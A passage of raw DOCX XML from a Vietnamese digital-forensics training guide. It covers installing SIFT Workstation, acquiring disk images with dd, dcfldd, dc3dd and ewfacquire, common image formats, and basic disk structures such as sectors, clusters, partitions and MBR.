              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="26F1AB1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Khởi động ở chế độ pháp chứng, không tự động mount và không ghi lên ổ kết nối.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="30E1EF3E">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4342ED6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REMnux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5146C49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Bản phân phối Linux chuyên phân tích mã độc, bổ trợ cho điều tra tệp đáng ngờ.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1839AE77">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="cài-sift-workstation"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Cài SIFT Workstation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D57A6A5">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60"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://github.com/teamdfir/sift-saltstack/releases/latest/download/sift-cli-linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="60"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> +x sift-cli-linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="60"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> mv sift-cli-linux /usr/local/bin/sift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="60"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> sift install</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60"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>which</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> vol3 autopsy log2timeline plaso mmls fls icat</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="15"/>
    <w:bookmarkEnd w:id="16"/>
    <w:p w14:paraId="41A1566B">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="tạo-ảnh-pháp-chứng"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3.3. Tạo ảnh pháp chứng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E845EC5">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55"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t># Bản sao RAW bằng dd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="60"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> dd if=/dev/sdb of=evidence.raw bs=4M conv=noerror,sync status=progress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55"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t># dcfldd có hash tích hợp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="60"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> dcfldd if=/dev/sdb of=evidence.dd hash=md5,sha256 hashlog=hashes.txt bs=512</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55"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t># dc3dd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="60"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> dc3dd if=/dev/sdb of=evidence.e01 hash=sha256 log=dc3dd.log</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55"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t># E01 bằng ewfacquire</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="60"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> ewfacquire /dev/sdb </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="67"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> /home/the_cyber_bite/cases/CASE001/evidence</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="17"/>
    <w:p w14:paraId="61C3A429">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="định-dạng-ảnh-thường-dùng"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3.4. Định dạng ảnh thường dùng</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="13"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2202"/>
        <w:gridCol w:w="7844"/>
      </w:tblGrid>
      <w:tr w14:paraId="0E776942">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1A1F44D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Định dạng</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7B1C673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Đặc điểm</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6B1C5544">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53D92B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RAW/DD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2BBA898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Sao chép từng sector, không siêu dữ liệu, không nén, tương thích rộng nhưng dung lượng lớn.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="23A914D6">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67EEDA8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E01 - Expert Witness</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4EBA220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Phổ biến nhất; chứa thông tin vụ việc, siêu dữ liệu, nén và hash MD5/SHA-1.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4EF69123">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76F0E0C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AFF4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0B37B46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Chuẩn mở nâng cao, hỗ trợ chia nhỏ ảnh, nén và chữ ký mật mã.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="76A23BE4">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743F45F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VMDK/VHD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1BC636C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Đĩa máy ảo, dùng khi chứng cứ là VM hoặc phân tích VMware/Hyper-V.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="27020E3B">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6578735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SMART</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="32F0B40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Định dạng ASR Data với tùy chọn mã hóa mạnh.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="43C99E8E">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:spacing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Mẹo chuyên viên:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Luôn phân tích trên bản sao đã xác minh, không kiểm tra trực tiếp chứng cứ gốc. Giữ bản gốc ở chế độ chống ghi và lưu trữ an toàn. Tối thiểu nên có một bản làm việc và một bản lưu trữ độc lập. Xác minh hash trước và sau mỗi phiên phân tích.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="13"/>
    <w:bookmarkEnd w:id="18"/>
    <w:p w14:paraId="39576168">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="pháp-chứng-ổ-đĩa---nền-tảng"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>4. Pháp chứng ổ đĩa - nền tảng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A48C2D6">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i/>
          <w:iCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Hệ thống tệp, bảng phân vùng và cấu trúc lưu trữ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B4A628">
      <w:pPr>
        <w:pStyle w:val="3"/>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Pháp chứng ổ đĩa là việc kiểm tra phương tiện lưu trữ để phục hồi dữ liệu và tái dựng sự kiện. Cần hiểu dữ liệu được lưu vật lý ra sao và điều gì thực sự xảy ra khi tệp bị “xóa”. Dữ liệu hiếm khi biến mất ngay; khả năng xác định phần nào còn có thể phục hồi là kỹ năng cốt lõi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A62CA9">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="cấu-trúc-từ-vật-lý-đến-logic"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>4.1. Cấu trúc từ vật lý đến logic</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="13"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2429"/>
        <w:gridCol w:w="7617"/>
      </w:tblGrid>
      <w:tr w14:paraId="0DDD132B">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4DF36F7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Thành phần</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6FB81D8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Ý nghĩa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="36D48C40">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0AD389B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Sector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3945C56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Đơn vị vật lý nhỏ nhất. Ổ truyền thống dùng 512 byte; ổ hiện đại thường dùng sector 4096 byte.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6BFB6773">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22EB204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Cluster/Allocation Unit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3896ACA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Đơn vị logic nhỏ nhất cấp cho tệp, gồm nhiều sector. Vùng dư có thể tồn tại giữa cuối dữ liệu và cuối cluster.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="28A887EF">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189271E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Partition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="05DDAEC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Vùng sector liên tục do MBR hoặc GPT định nghĩa, thường chứa một hệ thống tệp.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="79975EC3">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6543108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Volume</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6910603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 xml:space="preserve">Phân vùng đã định dạng; trên Windows thường hiển thị như </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>C:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> hoặc </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>D:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="344DC547">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70C4060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File System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7B92B27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Cấu trúc tổ chức tệp: NTFS, FAT32, exFAT, ext4, APFS, HFS+…</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="18D745F1">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02C669F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MBR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5981C8A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Bảng phân vùng kiểu cũ ở sector đầu, tối đa 4 phân vùng chính và khoảng 2 TB.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
